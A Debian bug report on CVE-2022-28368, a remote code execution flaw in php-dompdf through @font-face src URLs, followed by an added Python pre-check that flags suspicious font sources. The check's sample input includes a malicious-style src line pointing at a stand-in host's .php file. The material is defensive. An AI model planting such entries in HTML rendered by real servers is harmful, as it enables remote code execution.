Source: php-dompdf
Version: 0.6.2+dfsg-3.1
Severity: grave
Tags: security upstream
Forwarded: https://github.com/dompdf/dompdf/issues/2598
X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org>

Hi,

The following vulnerability was published for php-dompdf. I raise this as grave to ask the following question as well for future inclusion in bookworm: Is php-dompdf still maintained? I notice that it's at version 0.6.2 since stretch with one single NMU from the reproducible builds team. Or should it be removed from Debian?

CVE-2022-28368[0]:
| Dompdf 1.2.1 allows remote code execution via a .php file in the
| src:url field of an @font-face Cascading Style Sheets (CSS) statement
| (within an HTML input file).

If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2022-28368
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28368
[1] https://snyk.io/blog/security-alert-php-pdf-library-dompdf-rce/
[2] https://positive.security/blog/dompdf-rce
[3] https://github.com/dompdf/dompdf/issues/2598

Regards,
Salvatore
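As an added example (not part of the bug report and not dompdf's own code): a small Python pre-check that audits untrusted HTML/CSS for @font-face src URLs before it is handed to the renderer, flagging the pattern named in the CVE description (a non-font extension such as .php) and, by default, any remote font source. The sample markup and the host name in it are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Font formats a PDF renderer is expected to load from @font-face; anything
# else in a src url() is treated as suspicious (assumed allow-list).
ALLOWED_FONT_EXTENSIONS = {"ttf", "otf", "woff", "woff2"}

FONT_FACE_RE = re.compile(r"@font-face\s*\{(.*?)\}", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.IGNORECASE)


def audit_font_face_sources(css_or_html: str, allow_remote: bool = False) -> list:
    """Return one finding per @font-face src URL that should not reach the renderer.

    A finding is raised when the URL's path has a non-font extension (e.g. .php)
    or, unless allow_remote is set, when it points at a remote http(s) host.
    """
    findings = []
    for block in FONT_FACE_RE.finditer(css_or_html):
        for url in URL_RE.findall(block.group(1)):
            parsed = urlparse(url.strip())
            # Take the extension from the path only, so a query string such as
            # "?name=font.ttf" cannot disguise the real file name.
            ext = parsed.path.rsplit(".", 1)[-1].lower() if "." in parsed.path else ""
            reasons = []
            if ext not in ALLOWED_FONT_EXTENSIONS:
                reasons.append(f"non-font extension '.{ext}'" if ext else "no file extension")
            if parsed.scheme in ("http", "https") and not allow_remote:
                reasons.append("remote font source")
            if reasons:
                findings.append({"url": url, "reasons": reasons})
    return findings


# Constructed sample input: one legitimate local font and one src entry of the
# kind described in CVE-2022-28368 (a .php file served from a remote host).
SAMPLE_HTML = """
<style>
@font-face { font-family: "ok";  src: url("fonts/DejaVuSans.ttf"); }
@font-face { font-family: "bad"; src: url(http://untrusted.example/evil.php) format("truetype"); }
</style>
"""

if __name__ == "__main__":
    for finding in audit_font_face_sources(SAMPLE_HTML):
        print(finding["url"], "->", "; ".join(finding["reasons"]))
```

Rejecting the document when the list is non-empty (or keeping remote loading disabled in the renderer's options) keeps such a src entry from ever being fetched.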